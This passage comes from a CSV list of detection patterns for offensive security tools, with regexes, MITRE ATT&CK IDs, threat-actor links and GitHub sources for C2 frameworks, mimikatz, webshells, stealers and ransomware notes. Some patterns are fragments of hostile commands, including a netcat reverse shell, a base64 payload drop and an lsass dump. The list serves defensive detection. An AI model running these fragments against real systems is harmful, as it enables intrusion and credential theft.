Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","20170" "*_Shellcode.bin*",".{0,1000}_Shellcode\.bin.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","20171" "*_smtp_user-enum_hydra_*",".{0,1000}_smtp_user\-enum_hydra_.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network 
reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","20172" "*_snmp_snmpwalk.txt*",".{0,1000}_snmp_snmpwalk\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","20173" "*_snmp_snmpwalk_process_paths.txt*",".{0,1000}_snmp_snmpwalk_process_paths\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","20174" "*_snmp_snmpwalk_running_processes.txt*",".{0,1000}_snmp_snmpwalk_running_processes\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","20175" "*_snmp_snmpwalk_software_names.txt*",".{0,1000}_snmp_snmpwalk_software_names\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - 
TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","20176" "*_snmp_snmpwalk_storage_units.txt*",".{0,1000}_snmp_snmpwalk_storage_units\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","20177" "*_snmp_snmpwalk_system_processes.txt*",".{0,1000}_snmp_snmpwalk_system_processes\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","20178" "*_snmp_snmpwalk_tcp_ports.txt*",".{0,1000}_snmp_snmpwalk_tcp_ports\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","20179" "*_snmp_snmpwalk_user_accounts.txt*",".{0,1000}_snmp_snmpwalk_user_accounts\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","20180" 
"*_tcp_cc2(*",".{0,1000}_tcp_cc2\(.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","0","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","20181" "*_udp_cc2(*",".{0,1000}_udp_cc2\(.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","0","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","20182" "*_USBSTOR#Disk&Ven_&Prod_&Rev_0000*53f56307-b6bf-11d0-94f2-00a0c91efb8b*",".{0,1000}._USBSTOR#Disk&Ven_&Prod_&Rev_0000.{0,1000}53f56307-b6bf-11d0-94f2-00a0c91efb8b.{0,1000}","offensive_tool_keyword","Hak5 BashBunny","multi-function USB attack tool enabling automation attack payloads and various exploits by emulating trusted USB devices like keyboards - network adapters and mass storage devices","T1056 - T1059 - T1204","TA0001 - TA0009 - TA0002","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid #linux","can appear in windows eventid 
6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","20183" "*{os.getlogin()} | Fentanyl*",".{0,1000}\{os\.getlogin\(\)\}\s\|\sFentanyl.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","20184" "*{process_to_inject}.exe*",".{0,1000}\{process_to_inject\}\.exe.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","20185" "*| favfreak*",".{0,1000}\|\sfavfreak.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","20187" "*| fOreacH-obJeCT {( [Int]$_-As[ChAr]) })))"" 1> \Windows\Temp\* 2>&1*",".{0,1000}\|\sfOreacH\-obJeCT\s\{\(\s\[Int\]\$_\-As\[ChAr\]\)\s\}\)\)\)\""\s1\>\s\\Windows\\Temp\\.{0,1000}\s2\>\&1.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","20188" "*| hakrawler*",".{0,1000}\|\shakrawler.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/hakluke/hakrawler","1","0","#linux","N/A","6","10","4683","520","2024-12-21T20:40:03Z","2019-12-15T13:54:43Z","20189" "*|/bin/sh -i 2>&1|nc * >/tmp/f*",".{0,1000}\|\/bin\/sh\s\-i\s2\>\&1\|nc\s.{0,1000}\s\>\/tmp\/f.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","#linux","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","20192" "*|base64 -d > /tmp/traitor*",".{0,1000}\|base64\s\-d\s\>\s\/tmp\/traitor.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","0","#linux","N/A","N/A","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","20193" "*|f||e||t||c||h||-||s||o||m||e||-||p||r||o||x||i||e||s|*",".{0,1000}\|f\|\|e\|\|t\|\|c\|\|h\|\|\-\|\|s\|\|o\|\|m\|\|e\|\|\-\|\|p\|\|r\|\|o\|\|x\|\|i\|\|e\|\|s\|.{0,1000}","offensive_tool_keyword","fetch-some-proxies","Simple Python script for fetching ""some"" (usable) proxies","T1090 - T1071 - T1070","TA0002 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/stamparm/fetch-some-proxies","1","0","N/A","N/A","9","6","585","138","2023-03-15T09:14:25Z","2016-10-09T22:39:56Z","20194" "*|IEX}DumpSAM*",".{0,1000}\|IEX\}DumpSAM.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","20195" "*~/.csexec*",".{0,1000}\~\/\.csexec.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","20196" "*< /dev/console | uudecode && uncompress*",".{0,1000}\<\s\/dev\/console\s\|\suudecode\s\&\&\suncompress.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a 
string passed to popen() call to be controlled by an attacker arbitraty cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","20197" "**",".{0,1000}\<\/NetRipper\>.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","20198" "*<3 eo.oe ~ ANSSI E>*",".{0,1000}\<3\seo\.oe\s\~\sANSSI\sE\>.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation 
tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","https://www.virustotal.com/gui/file-analysis/YjU2NjE0YjBiOGNlMzNhZDVlYzRhYWFkMjJhNzQ4ZGQ6MTcyNDUyMDQ0Mw==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20200" "*<3 eo.oe*",".{0,1000}\<3\seo\.oe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20201" "**",".{0,1000}\.{0,1000}","offensive_tool_keyword","BadPotato","Windows Privilege Escalation Exploit BadPotato","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","Earth Lusca","Privilege 
Escalation","https://github.com/BeichenDream/BadPotato","1","0","#originalfilename","N/A","10","9","836","136","2020-05-10T15:42:21Z","2020-05-10T10:01:20Z","20205" "**",".{0,1000}\.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cracked5pider/CoffeeLdr","1","0","N/A","N/A","10","10","286","38","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z","20206" "*Moriarty<*",".{0,1000}\Moriarty\<.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs - detect various vulnerabilities and suggest potential exploits for 
Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","N/A","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","20207" "*\lsass*ProcessHacker**",".{0,1000}\\\lsass\<\/Data\>\.{0,1000}ProcessHacker.{0,1000}\<\/Data\>.{0,1000}","offensive_tool_keyword","processhacker","dump lsass process with processhacker","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","N/A","pipe connect ED 18 sysmon","10","10","N/A","N/A","N/A","N/A","20211" "*.:NCC:. Shell v*",".{0,1000}\\.\:NCC\:\.\sShell\sv.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php text webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","20229" "*

-=[+] IDBTEAM SHELLS*",".{0,1000}\\\-\=\[\+\]\sIDBTEAM\sSHELLS.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","#content","php text webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","20230" "*

All your files was encrypted!*",".{0,1000}\All\syour\sfiles\swas\sencrypted!.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","20231" "*

JSP Backdoor Reverse Shell*",".{0,1000}\JSP\sBackdoor\sReverse\sShell.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20233" "*

Password Hasher for PHP Shell 2.1*",".{0,1000}\Password\sHasher\sfor\sPHP\sShell\s2\.1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20234" "*

PHP Shell *",".{0,1000}\PHP\sShell\s\<\?php\secho\soffender\s\?\>.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20235" "*

PhpShell 2.0*",".{0,1000}\PhpShell\s2\.0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20236" "*

PowerAutomate C2 Portal*",".{0,1000}\PowerAutomate\sC2\sPortal.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","0","#content","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","20237" "*

PowerUp report for *",".{0,1000}\PowerUp\sreport\sfor\s.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","20238" "*

PowerUp report for *",".{0,1000}\PowerUp\sreport\sfor\s.{0,1000}","offensive_tool_keyword","PowerUpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Black Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","PowerUpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20239" "*

PowerUp report for *",".{0,1000}\PowerUp\sreport\sfor\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","PowerUpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20240" "*

Spider DDOS Shell*",".{0,1000}\Spider\sDDOS\sShell.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20241" "*

Wraith Login*",".{0,1000}\Wraith\sLogin.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","20242" "*

Laudanum Tools*",".{0,1000}\Laudanum\sTools.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php text webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","20243" "*

Vulnerabl Schasks*",".{0,1000}\Vulnerabl\sSchasks.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","20244" "*

Why pay us?

*",".{0,1000}\Why\spay\sus\?\<\/h2\>.{0,1000}","offensive_tool_keyword","SunCrypt","SunCrypt ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#content","N/A","10","4","357","52","2025-04-22T10:00:56Z","2021-07-28T21:00:52Z","20245" "*

